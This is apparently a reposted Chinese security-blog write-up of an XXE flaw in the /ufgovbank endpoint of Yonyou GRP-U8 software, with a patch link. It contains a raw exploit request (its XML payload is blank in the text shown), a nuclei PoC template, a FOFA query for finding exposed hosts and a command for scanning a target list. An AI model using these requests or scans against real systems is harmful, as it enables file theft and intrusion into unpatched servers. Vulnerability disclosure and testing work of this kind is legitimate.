免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
福利:小编整理了大量电子书和护网常用工具,在文末免费获取。
介绍漏洞前先介绍下什么是XXE漏洞?
XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。
XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XXE漏洞的基础上,发展出了Blind XXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVG header)应用比较广泛,此外,网上有一些在线XML格式化工具也存在过问题。
01
—
漏洞名称
用友GRP-U8 ufgovbank XXE漏洞
02
—
漏洞影响
用友GRP-U8
03
—
漏洞描述
用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统,旨在提高内部控制的效率和准确性。该系统/ufgovbank接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。
04
—
app="用友-GRP-U8"
05
—
漏洞复现
注册一个dnslog平台的账号,用于回显,如http://dnslog.pw/dns/?&monitor=true,注册好之后勾选自动刷新选项,然后向靶场发送如下数据包,让靶场解析xml数据然后访问dns
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
reqData=
&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
在DNSlog平台能看到一条访问记录
漏洞复现成功
06
—
nuclei poc
poc文件内容如下
id: yonyou-grp-u8-ufgovbank-xxe
info:
name: 用友GRP-U8 ufgovbank XXE漏洞
author: fgz
severity: critical
description: 用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统,旨在提高内部控制的效率和准确性。该系统/ufgovbank接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器数据泄露以及被远控。
metadata:
max-request: 1
fofa-query: app="用友-GRP-U8"
verified: true
requests:
- raw:
- |+
POST /ufgovbank HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
reqData=
&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
condition: and
运行POC进行漏洞检测
nuclei.exe -t mypoc/用友/yonyou-grp-u8-ufgovbank-xxe.yaml -l data/用友-GRP-U8.txt
07
—
修复建议
用友安全中心在2024年1月2号发布了漏洞补丁,补丁链接如下,请自行升级。
https://security.yonyou.com/#/patchInfo?identifier=f234175cba534454adbe1caf9dc2fc88
08
—
原文始发于微信公众号(AI与网安):【在野1day】用友GRP-U8 ufgovbank XXE漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论